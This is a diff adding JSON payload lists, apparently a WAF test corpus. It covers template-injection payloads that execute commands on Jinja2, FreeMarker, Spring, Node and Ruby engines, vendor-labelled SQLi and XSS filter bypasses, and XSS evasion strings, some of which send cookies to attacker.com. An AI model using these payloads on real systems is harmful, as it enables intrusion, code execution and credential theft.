{"id":"ssti-adv-005","payload":"{{config}}","category":"ssti","method":"GET","severity_hint":"critical","tags":["jinja2","flask","info-disclosure"],"notes":"Flask config dump","expected_block":true},
|
|
7
|
+
{"id":"ssti-adv-006","payload":"{{config.__class__.__init__.__globals__['os'].popen('id').read()}}","category":"ssti","method":"GET","severity_hint":"critical","tags":["jinja2","rce","python"],"notes":"Jinja2 RCE via config globals","expected_block":true},
|
|
8
|
+
{"id":"ssti-adv-007","payload":"{{''.__class__.__mro__[2].__subclasses__()}}","category":"ssti","method":"GET","severity_hint":"critical","tags":["jinja2","python","class-chain"],"notes":"Python subclass enumeration","expected_block":true},
|
|
9
|
+
{"id":"ssti-adv-008","payload":"{{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()}}","category":"ssti","method":"GET","severity_hint":"critical","tags":["jinja2","rce","python","subprocess"],"notes":"Jinja2 subprocess RCE","expected_block":true},
|
|
10
|
+
{"id":"ssti-adv-009","payload":"{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}","category":"ssti","method":"GET","severity_hint":"critical","tags":["jinja2","rce","flask"],"notes":"Flask request object RCE","expected_block":true},
|
|
11
|
+
{"id":"ssti-adv-010","payload":"{{cycler.__init__.__globals__.os.popen('id').read()}}","category":"ssti","method":"GET","severity_hint":"critical","tags":["jinja2","rce","cycler"],"notes":"Jinja2 cycler object RCE","expected_block":true},
|
|
12
|
+
{"id":"ssti-adv-011","payload":"{{joiner.__init__.__globals__.os.popen('id').read()}}","category":"ssti","method":"GET","severity_hint":"critical","tags":["jinja2","rce","joiner"],"notes":"Jinja2 joiner object RCE","expected_block":true},
|
|
13
|
+
{"id":"ssti-adv-012","payload":"{{namespace.__init__.__globals__.os.popen('id').read()}}","category":"ssti","method":"GET","severity_hint":"critical","tags":["jinja2","rce","namespace"],"notes":"Jinja2 namespace object RCE","expected_block":true},
|
|
14
|
+
{"id":"ssti-adv-013","payload":"{{lipsum.__globals__['os'].popen('id').read()}}","category":"ssti","method":"GET","severity_hint":"critical","tags":["jinja2","rce","lipsum"],"notes":"Jinja2 lipsum globals RCE","expected_block":true},
|
|
15
|
+
{"id":"ssti-adv-014","payload":"{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read()}}","category":"ssti","method":"GET","severity_hint":"critical","tags":["jinja2","rce","self"],"notes":"Jinja2 self reference RCE","expected_block":true},
|
|
16
|
+
{"id":"ssti-adv-015","payload":"{{''|attr('__class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')()|attr('__getitem__')(396)('id',shell=True,stdout=-1)|attr('communicate')()}}","category":"ssti","method":"GET","severity_hint":"critical","tags":["jinja2","rce","attr-filter","evasion"],"notes":"Jinja2 attr filter bypass","expected_block":true},
|
|
17
|
+
{"id":"ssti-adv-016","payload":"{%set cmd='id'%}{{''.__class__.__mro__[1].__subclasses__()[396](cmd,shell=True,stdout=-1).communicate()}}","category":"ssti","method":"GET","severity_hint":"critical","tags":["jinja2","rce","set-tag"],"notes":"Jinja2 set tag variable","expected_block":true},
|
|
18
|
+
{"id":"ssti-adv-017","payload":"{{\"\"[\"\\x5f\\x5fclass\\x5f\\x5f\"]}}","category":"ssti","method":"GET","severity_hint":"critical","tags":["jinja2","evasion","hex"],"notes":"Hex escape __class__","expected_block":true},
|
|
19
|
+
{"id":"ssti-adv-018","payload":"{{7*'7'}}","category":"ssti","method":"GET","severity_hint":"high","tags":["jinja2","twig","fingerprint"],"notes":"Engine fingerprint: Jinja2=7777777, Twig=49","expected_block":true},
|
|
20
|
+
{"id":"ssti-adv-019","payload":"<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"id\")}","category":"ssti","method":"GET","severity_hint":"critical","tags":["freemarker","rce","java"],"notes":"FreeMarker Execute class RCE","expected_block":true},
|
|
21
|
+
{"id":"ssti-adv-020","payload":"<#assign classloader=object?api.class.protectionDomain.classLoader><#assign owc=classloader.loadClass(\"freemarker.template.ObjectWrapper\")><#assign dwf=owc.getField(\"DEFAULT_WRAPPER\").get(null)><#assign ec=classloader.loadClass(\"freemarker.template.utility.Execute\")>${dwf.newInstance(ec,null)(\"id\")}","category":"ssti","method":"GET","severity_hint":"critical","tags":["freemarker","rce","classloader"],"notes":"FreeMarker classloader RCE","expected_block":true},
|
|
22
|
+
{"id":"ssti-adv-021","payload":"${\"freemarker.template.utility.Execute\"?new()(\"id\")}","category":"ssti","method":"GET","severity_hint":"critical","tags":["freemarker","rce","short"],"notes":"FreeMarker short RCE","expected_block":true},
|
|
23
|
+
{"id":"ssti-adv-022","payload":"${\"\".getClass().forName(\"java.lang.Runtime\").getRuntime().exec(\"id\")}","category":"ssti","method":"GET","severity_hint":"critical","tags":["velocity","rce","java"],"notes":"Velocity Runtime exec","expected_block":true},
|
|
24
|
+
{"id":"ssti-adv-023","payload":"#set($rt=$\"\".getClass().forName(\"java.lang.Runtime\"))#set($r=$rt.getRuntime())$r.exec(\"id\")","category":"ssti","method":"GET","severity_hint":"critical","tags":["velocity","rce","set"],"notes":"Velocity set directive RCE","expected_block":true},
|
|
25
|
+
{"id":"ssti-adv-024","payload":"*{T(java.lang.Runtime).getRuntime().exec('id')}","category":"ssti","method":"GET","severity_hint":"critical","tags":["thymeleaf","rce","spel"],"notes":"Thymeleaf SpEL RCE","expected_block":true},
|
|
26
|
+
{"id":"ssti-adv-025","payload":"${T(java.lang.Runtime).getRuntime().exec('id')}","category":"ssti","method":"GET","severity_hint":"critical","tags":["spring","spel","rce"],"notes":"Spring Expression Language RCE","expected_block":true},
|
|
27
|
+
{"id":"ssti-adv-026","payload":"${T(java.lang.System).getenv()}","category":"ssti","method":"GET","severity_hint":"critical","tags":["spring","spel","info-disclosure"],"notes":"SpEL environment dump","expected_block":true},
|
|
28
|
+
{"id":"ssti-adv-027","payload":"{{constructor.constructor('return this.process.mainModule.require(\"child_process\").execSync(\"id\")')()}}","category":"ssti","method":"GET","severity_hint":"critical","tags":["pug","rce","node"],"notes":"Pug/Jade template RCE","expected_block":true},
|
|
29
|
+
{"id":"ssti-adv-028","payload":"- var require = global.process.mainModule.require\n= require('child_process').execSync('id')","category":"ssti","method":"GET","severity_hint":"critical","tags":["pug","rce","require"],"notes":"Pug require-based RCE","expected_block":true},
|
|
30
|
+
{"id":"ssti-adv-029","payload":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('id')\")()}}","category":"ssti","method":"GET","severity_hint":"critical","tags":["handlebars","rce","node"],"notes":"Handlebars constructor RCE","expected_block":true},
|
|
31
|
+
{"id":"ssti-adv-030","payload":"{{#with \"s\" as |string|}}\n {{#with \"e\"}}\n {{#with split as |conslist|}}\n {{this.pop}}\n {{this.push (lookup string.sub \"constructor\")}}\n {{this.pop}}\n {{#with string.split as |codelist|}}\n {{this.pop}}\n {{this.push \"return require('child_process').execSync('id');\"}}\n {{this.pop}}\n {{#each conslist}}\n {{#with (string.sub.apply 0 codelist)}}\n {{this}}\n {{/with}}\n {{/each}}\n {{/with}}\n {{/with}}\n {{/with}}\n{{/with}}","category":"ssti","method":"POST","severity_hint":"critical","tags":["handlebars","rce","prototype"],"notes":"Handlebars prototype pollution RCE","expected_block":true},
|
|
32
|
+
{"id":"ssti-adv-031","payload":"<%- global.process.mainModule.require('child_process').execSync('id') %>","category":"ssti","method":"GET","severity_hint":"critical","tags":["ejs","rce","node"],"notes":"EJS template RCE","expected_block":true},
|
|
33
|
+
{"id":"ssti-adv-032","payload":"<%= `id` %>","category":"ssti","method":"GET","severity_hint":"critical","tags":["erb","rce","ruby"],"notes":"ERB backtick RCE","expected_block":true},
|
|
34
|
+
{"id":"ssti-adv-033","payload":"<%= system('id') %>","category":"ssti","method":"GET","severity_hint":"critical","tags":["erb","rce","ruby"],"notes":"ERB system() RCE","expected_block":true},
|
|
35
|
+
{"id":"ssti-adv-034","payload":"<%= IO.popen('id').read %>","category":"ssti","method":"GET","severity_hint":"critical","tags":["erb","rce","ruby","io"],"notes":"ERB IO.popen RCE","expected_block":true},
|
|
36
|
+
{"id":"ssti-adv-035","payload":"<%= File.read('/etc/passwd') %>","category":"ssti","method":"GET","severity_hint":"critical","tags":["erb","file-read","ruby"],"notes":"ERB file read","expected_block":true},
|
|
37
|
+
{"id":"ssti-adv-036","payload":"{{\"id\" | system}}","category":"ssti","method":"GET","severity_hint":"critical","tags":["liquid","rce"],"notes":"Liquid system filter (if available)","expected_block":true},
|
|
38
|
+
{"id":"ssti-adv-037","payload":"@(1+1)","category":"ssti","method":"GET","severity_hint":"high","tags":["razor","dotnet","probe"],"notes":"Razor syntax probe","expected_block":true},
|
|
39
|
+
{"id":"ssti-adv-038","payload":"@{var p = new System.Diagnostics.Process();p.StartInfo.FileName=\"cmd.exe\";p.StartInfo.Arguments=\"/c id\";p.Start();}","category":"ssti","method":"GET","severity_hint":"critical","tags":["razor","rce","dotnet"],"notes":"Razor Process.Start RCE","expected_block":true},
|
|
40
|
+
{"id":"ssti-adv-039","payload":"{{= 7*7}}","category":"ssti","method":"GET","severity_hint":"high","tags":["dot","probe"],"notes":"doT.js template probe","expected_block":true},
|
|
41
|
+
{"id":"ssti-adv-040","payload":"{{= global.process.mainModule.require('child_process').execSync('id').toString()}}","category":"ssti","method":"GET","severity_hint":"critical","tags":["dot","rce","node"],"notes":"doT.js template RCE","expected_block":true}
|
|
42
|
+
]
|
|
@@ -0,0 +1,62 @@
|
|
|
1
|
+
[
|
|
2
|
+
{"id":"waf-bypass-001","payload":"' /*!50000AND*/ 1=1--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","modsecurity","mysql"],"notes":"ModSecurity CRS bypass via MySQL conditional comment","expected_block":true,"vendor":"ModSecurity"},
|
|
3
|
+
{"id":"waf-bypass-002","payload":"' AND{x 1}=1--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","modsecurity","curly"],"notes":"ModSecurity bypass via curly brace syntax","expected_block":true,"vendor":"ModSecurity"},
|
|
4
|
+
{"id":"waf-bypass-003","payload":"' /*!11440AND*/ 1=1--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","modsecurity","version-comment"],"notes":"ModSecurity CRS3 bypass version comment","expected_block":true,"vendor":"ModSecurity"},
|
|
5
|
+
{"id":"waf-bypass-004","payload":"<svg/onload=alert(1)>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","modsecurity","html-entity"],"notes":"ModSecurity XSS bypass via hex entities","expected_block":true,"vendor":"ModSecurity"},
|
|
6
|
+
{"id":"waf-bypass-005","payload":"<svg/onload=alert%26%2340%3B1%26%2341%3B>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","modsecurity","double-encode"],"notes":"ModSecurity XSS double encoded entities","expected_block":true,"vendor":"ModSecurity"},
|
|
7
|
+
{"id":"waf-bypass-006","payload":"' OR 1=1-- -","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","modsecurity","space-dash"],"notes":"ModSecurity bypass: space before final dash","expected_block":true,"vendor":"ModSecurity"},
|
|
8
|
+
{"id":"waf-bypass-007","payload":"<img src=x onerror=alert`1`>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","modsecurity","template-literal"],"notes":"ModSecurity XSS bypass via template literals","expected_block":true,"vendor":"ModSecurity"},
|
|
9
|
+
{"id":"waf-bypass-008","payload":"<details/open/ontoggle=alert`1`>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","modsecurity","details"],"notes":"ModSecurity XSS bypass via details element","expected_block":true,"vendor":"ModSecurity"},
|
|
10
|
+
{"id":"waf-bypass-009","payload":"<a href=javas%09cript:alert(1)>x</a>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","cloudflare","tab-inject"],"notes":"Cloudflare XSS bypass tab in javascript:","expected_block":true,"vendor":"Cloudflare"},
|
|
11
|
+
{"id":"waf-bypass-010","payload":"<svg/onload=location='javas'+'cript:ale'+'rt(1)'>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","cloudflare","string-concat"],"notes":"Cloudflare XSS bypass string concatenation","expected_block":true,"vendor":"Cloudflare"},
|
|
12
|
+
{"id":"waf-bypass-011","payload":"<svg/onload=self[`al`+`ert`](1)>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","cloudflare","bracket-notation"],"notes":"Cloudflare XSS bypass bracket notation","expected_block":true,"vendor":"Cloudflare"},
|
|
13
|
+
{"id":"waf-bypass-012","payload":"<svg onload=alert%26%230000000040;1)>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","cloudflare","padded-entity"],"notes":"Cloudflare XSS bypass padded entity","expected_block":true,"vendor":"Cloudflare"},
|
|
14
|
+
{"id":"waf-bypass-013","payload":"<img src onerror=window[`\\x61\\x6c\\x65\\x72\\x74`]`1`>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","cloudflare","hex-escape"],"notes":"Cloudflare XSS bypass hex escape","expected_block":true,"vendor":"Cloudflare"},
|
|
15
|
+
{"id":"waf-bypass-014","payload":"' AND 1=1 AND '%'='","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","cloudflare","percent"],"notes":"Cloudflare SQLi bypass percent operator","expected_block":true,"vendor":"Cloudflare"},
|
|
16
|
+
{"id":"waf-bypass-015","payload":"' OR 1 LIKE 1-- -","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","cloudflare","like"],"notes":"Cloudflare SQLi bypass LIKE operator","expected_block":true,"vendor":"Cloudflare"},
|
|
17
|
+
{"id":"waf-bypass-016","payload":"<video><source onerror=alert(1)>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","cloudflare","video"],"notes":"Cloudflare XSS bypass video source","expected_block":true,"vendor":"Cloudflare"},
|
|
18
|
+
{"id":"waf-bypass-017","payload":"' /*!50000%75%6e%69%6f%6e*/ /*!50000%73%65%6c%65%63%74*/ 1,2,3--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","aws-waf","hex-comment"],"notes":"AWS WAF SQLi bypass hex+version comment","expected_block":true,"vendor":"AWS WAF"},
|
|
19
|
+
{"id":"waf-bypass-018","payload":"<IMG \"\"\"><SCRIPT>alert(1)</SCRIPT>\">","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","aws-waf","img-script"],"notes":"AWS WAF XSS bypass malformed img+script","expected_block":true,"vendor":"AWS WAF"},
|
|
20
|
+
{"id":"waf-bypass-019","payload":"' UNION%23%0ASELECT 1,2,3--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","aws-waf","hash-newline"],"notes":"AWS WAF SQLi bypass hash+newline","expected_block":true,"vendor":"AWS WAF"},
|
|
21
|
+
{"id":"waf-bypass-020","payload":"0' DIV 1 UNION%23foo%0AALL%23foo%0ASELECT%23foo%0A1,2,3--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","aws-waf","multi-comment"],"notes":"AWS WAF SQLi bypass multi-comment newline","expected_block":true,"vendor":"AWS WAF"},
|
|
22
|
+
{"id":"waf-bypass-021","payload":"<details open ontoggle=self['\\x61\\x6c\\x65\\x72\\x74'](1)>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","aws-waf","hex-function"],"notes":"AWS WAF XSS bypass hex function name","expected_block":true,"vendor":"AWS WAF"},
|
|
23
|
+
{"id":"waf-bypass-022","payload":"<svg onload=alert(1)>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","aws-waf","basic"],"notes":"AWS WAF basic XSS test","expected_block":true,"vendor":"AWS WAF"},
|
|
24
|
+
{"id":"waf-bypass-023","payload":"' AND 1=CONVERT(INT,@@version)--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","imperva","mssql"],"notes":"Imperva SQLi bypass via CONVERT","expected_block":true,"vendor":"Imperva"},
|
|
25
|
+
{"id":"waf-bypass-024","payload":"' /*!00000UNION*/ /*!00000SELECT*/ 1,user()--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","imperva","zero-version"],"notes":"Imperva SQLi bypass zero-version comment","expected_block":true,"vendor":"Imperva"},
|
|
26
|
+
{"id":"waf-bypass-025","payload":"<svg/onload=eval(atob('YWxlcnQoMSk='))>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","imperva","base64"],"notes":"Imperva XSS bypass base64 eval","expected_block":true,"vendor":"Imperva"},
|
|
27
|
+
{"id":"waf-bypass-026","payload":"' OR 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","imperva","error-based"],"notes":"Imperva SQLi error-based bypass","expected_block":true,"vendor":"Imperva"},
|
|
28
|
+
{"id":"waf-bypass-027","payload":"<svg onload=\"[1].find(alert)\">","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","imperva","array-method"],"notes":"Imperva XSS bypass via Array.find","expected_block":true,"vendor":"Imperva"},
|
|
29
|
+
{"id":"waf-bypass-028","payload":"<svg onload=\"[1].map(alert)\">","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","imperva","array-method"],"notes":"Imperva XSS bypass via Array.map","expected_block":true,"vendor":"Imperva"},
|
|
30
|
+
{"id":"waf-bypass-029","payload":"' UNION SELECT 1,2,3/*&id=1*/--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","akamai","comment-param"],"notes":"Akamai SQLi bypass comment in param","expected_block":true,"vendor":"Akamai"},
|
|
31
|
+
{"id":"waf-bypass-030","payload":"<svg/onload=\"top['al'+'ert'](1)\">","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","akamai","string-split"],"notes":"Akamai XSS bypass string splitting","expected_block":true,"vendor":"Akamai"},
|
|
32
|
+
{"id":"waf-bypass-031","payload":"' UNION(SELECT 1,CONCAT(0x7e,VERSION()),3)--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","akamai","no-space"],"notes":"Akamai SQLi bypass no space UNION","expected_block":true,"vendor":"Akamai"},
|
|
33
|
+
{"id":"waf-bypass-032","payload":"<x/onclick=globalThis['\\141\\154\\145\\162\\164'](1)>test","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","akamai","octal"],"notes":"Akamai XSS bypass octal escape","expected_block":true,"vendor":"Akamai"},
|
|
34
|
+
{"id":"waf-bypass-033","payload":"' AND extractvalue(1,concat(0x7e,(SELECT version())))--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","akamai","extractvalue"],"notes":"Akamai SQLi bypass extractvalue","expected_block":true,"vendor":"Akamai"},
|
|
35
|
+
{"id":"waf-bypass-034","payload":"<img src=x onerror=window.onerror=alert;throw+1>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","akamai","throw"],"notes":"Akamai XSS bypass via throw","expected_block":true,"vendor":"Akamai"},
|
|
36
|
+
{"id":"waf-bypass-035","payload":"' OR 1=1-- -/*","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","f5","trailing-comment"],"notes":"F5 BIG-IP SQLi bypass trailing comment","expected_block":true,"vendor":"F5 BIG-IP"},
|
|
37
|
+
{"id":"waf-bypass-036","payload":"<svg/onload=fetch(`//attacker.com?${document.cookie}`)>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","f5","fetch"],"notes":"F5 BIG-IP XSS bypass via fetch()","expected_block":true,"vendor":"F5 BIG-IP"},
|
|
38
|
+
{"id":"waf-bypass-037","payload":"' UNION SELECT /*!50000 1,2,*/3--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","f5","inline-comment"],"notes":"F5 BIG-IP SQLi bypass partial comment","expected_block":true,"vendor":"F5 BIG-IP"},
|
|
39
|
+
{"id":"waf-bypass-038","payload":"<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)//>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","f5","mutation"],"notes":"F5 BIG-IP XSS mutation bypass","expected_block":true,"vendor":"F5 BIG-IP"},
|
|
40
|
+
{"id":"waf-bypass-039","payload":"' AND 1=0 /*!UNION*/ /*!SELECT*/ 1,2,3--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","sucuri","exec-comment"],"notes":"Sucuri SQLi bypass exec comment","expected_block":true,"vendor":"Sucuri"},
|
|
41
|
+
{"id":"waf-bypass-040","payload":"<svg onload=prompt%26%230000000040document.domain)>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","sucuri","padded-entity"],"notes":"Sucuri XSS bypass padded entity","expected_block":true,"vendor":"Sucuri"},
|
|
42
|
+
{"id":"waf-bypass-041","payload":"' UNION ALL SELECT NULL,NULL,CONCAT(0x7178786b71,IFNULL(CAST(schema_name AS CHAR),0x20),0x7176627871) FROM information_schema.schemata--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","sucuri","junk-chars"],"notes":"Sucuri SQLi bypass junk hex markers","expected_block":true,"vendor":"Sucuri"},
|
|
43
|
+
{"id":"waf-bypass-042","payload":"<input/onfocus=alert(1) autofocus>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","sucuri","input"],"notes":"Sucuri XSS bypass input autofocus","expected_block":true,"vendor":"Sucuri"},
|
|
44
|
+
{"id":"waf-bypass-043","payload":"' AND 1 IN (SELECT TOP 1 CAST(name AS NVARCHAR(4000)) FROM sysobjects WHERE xtype='U')--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","barracuda","mssql"],"notes":"Barracuda SQLi bypass CAST/sysobjects","expected_block":true,"vendor":"Barracuda"},
|
|
45
|
+
{"id":"waf-bypass-044","payload":"<body/onload=alert(1)>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","barracuda","body"],"notes":"Barracuda XSS bypass body onload","expected_block":true,"vendor":"Barracuda"},
|
|
46
|
+
{"id":"waf-bypass-045","payload":"' /*!UNION*/ /*!ALL*/ /*!SELECT*/ 1,version(),3--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","barracuda","exec-comment"],"notes":"Barracuda SQLi bypass exec comments","expected_block":true,"vendor":"Barracuda"},
|
|
47
|
+
{"id":"waf-bypass-046","payload":"<marquee/onstart=alert(1)>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","barracuda","marquee"],"notes":"Barracuda XSS bypass marquee","expected_block":true,"vendor":"Barracuda"},
|
|
48
|
+
{"id":"waf-bypass-047","payload":"' UNION SELECT 1,@@version,3 FROM master..sysdatabases--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","fortinet","mssql"],"notes":"Fortinet SQLi bypass master..sysdatabases","expected_block":true,"vendor":"Fortinet"},
|
|
49
|
+
{"id":"waf-bypass-048","payload":"<isindex type=image src=1 onerror=alert(1)>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","fortinet","isindex"],"notes":"Fortinet XSS bypass legacy isindex","expected_block":true,"vendor":"Fortinet"},
|
|
50
|
+
{"id":"waf-bypass-049","payload":"' OR 1 GROUP BY CONCAT(version(),FLOOR(RAND(0)*2)) HAVING MIN(0)--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","fortinet","group-by"],"notes":"Fortinet SQLi bypass GROUP BY error","expected_block":true,"vendor":"Fortinet"},
|
|
51
|
+
{"id":"waf-bypass-050","payload":"<svg><script>alert(1)</script>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","fortinet","svg-script"],"notes":"Fortinet XSS bypass SVG script entity","expected_block":true,"vendor":"Fortinet"},
|
|
52
|
+
{"id":"waf-bypass-051","payload":"' AND 1=(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT (SELECT CONCAT(0x7e,version(),0x7e)) FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","azure-waf","nested-select"],"notes":"Azure WAF SQLi bypass nested select","expected_block":true,"vendor":"Azure WAF"},
|
|
53
|
+
{"id":"waf-bypass-052","payload":"<svg/onload=alert(1)>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","azure-waf","basic-svg"],"notes":"Azure WAF basic SVG XSS test","expected_block":true,"vendor":"Azure WAF"},
|
|
54
|
+
{"id":"waf-bypass-053","payload":"' /*!UNION*/ /*!SELECT*/ group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","azure-waf","group-concat"],"notes":"Azure WAF SQLi bypass group_concat","expected_block":true,"vendor":"Azure WAF"},
|
|
55
|
+
{"id":"waf-bypass-054","payload":"<svg/onload=\"navigator.sendBeacon('//attacker.com',document.cookie)\">","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","azure-waf","beacon"],"notes":"Azure WAF XSS bypass sendBeacon exfil","expected_block":true,"vendor":"Azure WAF"},
|
|
56
|
+
{"id":"waf-bypass-055","payload":"' UNION%0bSELECT%0b1,2,3--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","generic","vtab"],"notes":"Generic WAF bypass vertical tab separator","expected_block":true,"vendor":"generic"},
|
|
57
|
+
{"id":"waf-bypass-056","payload":"' UNION%0cSELECT%0c1,2,3--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","generic","formfeed"],"notes":"Generic WAF bypass form feed separator","expected_block":true,"vendor":"generic"},
|
|
58
|
+
{"id":"waf-bypass-057","payload":"<svg/onload=top[/al/.source+/ert/.source](1)>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","generic","regex-source"],"notes":"Generic XSS bypass regex source concat","expected_block":true,"vendor":"generic"},
|
|
59
|
+
{"id":"waf-bypass-058","payload":"<svg onload=window['\\u0061lert'](1)>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","generic","unicode-escape"],"notes":"Generic XSS bypass unicode escape","expected_block":true,"vendor":"generic"},
|
|
60
|
+
{"id":"waf-bypass-059","payload":"' OR 1=1 /*!ORDER BY*/ 1--","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["sqli","generic","exec-comment"],"notes":"Generic WAF bypass ORDER BY in exec comment","expected_block":true,"vendor":"generic"},
|
|
61
|
+
{"id":"waf-bypass-060","payload":"<svg onload=location=`javas`+`cript:ale`+`rt%2`+`81%29`>","category":"waf-bypass","method":"GET","severity_hint":"critical","tags":["xss","generic","fragment-concat"],"notes":"Generic XSS bypass fragmented concatenation","expected_block":true,"vendor":"generic"}
|
|
62
|
+
]
|
|
@@ -0,0 +1,82 @@
|
|
|
1
|
+
[
|
|
2
|
+
{"id":"xss-ev-001","payload":"<svg/onload=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["svg","event-handler","filter-bypass"],"notes":"SVG onload no spaces","expected_block":true},
|
|
3
|
+
{"id":"xss-ev-002","payload":"<svg onload=alert1>","category":"xss","method":"GET","severity_hint":"critical","tags":["svg","template-literal"],"notes":"Template literal syntax","expected_block":true},
|
|
4
|
+
{"id":"xss-ev-003","payload":"<svg/onload=confirm(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["svg","confirm"],"notes":"confirm() instead of alert()","expected_block":true},
|
|
5
|
+
{"id":"xss-ev-004","payload":"<svg/onload=prompt(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["svg","prompt"],"notes":"prompt() instead of alert()","expected_block":true},
|
|
6
|
+
{"id":"xss-ev-005","payload":"<img src=x onerror=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["img","onerror"],"notes":"Classic img onerror","expected_block":true},
|
|
7
|
+
{"id":"xss-ev-006","payload":"<img/src=x/onerror=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["img","onerror","no-space"],"notes":"Slash instead of space","expected_block":true},
|
|
8
|
+
{"id":"xss-ev-007","payload":"<img src=x onerror=alert(String.fromCharCode(88,83,83))>","category":"xss","method":"GET","severity_hint":"critical","tags":["img","charcode","evasion"],"notes":"String.fromCharCode bypass","expected_block":true},
|
|
9
|
+
{"id":"xss-ev-008","payload":"<input onfocus=alert(1) autofocus>","category":"xss","method":"GET","severity_hint":"critical","tags":["input","autofocus"],"notes":"Autofocus triggers onfocus","expected_block":true},
|
|
10
|
+
{"id":"xss-ev-009","payload":"<input onblur=alert(1) autofocus><input autofocus>","category":"xss","method":"GET","severity_hint":"critical","tags":["input","onblur"],"notes":"Dual input onblur trick","expected_block":true},
|
|
11
|
+
{"id":"xss-ev-010","payload":"<select autofocus onfocus=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["select","autofocus"],"notes":"Select element autofocus","expected_block":true},
|
|
12
|
+
{"id":"xss-ev-011","payload":"<textarea onfocus=alert(1) autofocus>","category":"xss","method":"GET","severity_hint":"critical","tags":["textarea","autofocus"],"notes":"Textarea autofocus","expected_block":true},
|
|
13
|
+
{"id":"xss-ev-012","payload":"<keygen autofocus onfocus=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["keygen","autofocus"],"notes":"Deprecated keygen element","expected_block":true},
|
|
14
|
+
{"id":"xss-ev-013","payload":"<video><source onerror=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["video","source","onerror"],"notes":"Video source error","expected_block":true},
|
|
15
|
+
{"id":"xss-ev-014","payload":"<video src=x onerror=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["video","onerror"],"notes":"Video direct onerror","expected_block":true},
|
|
16
|
+
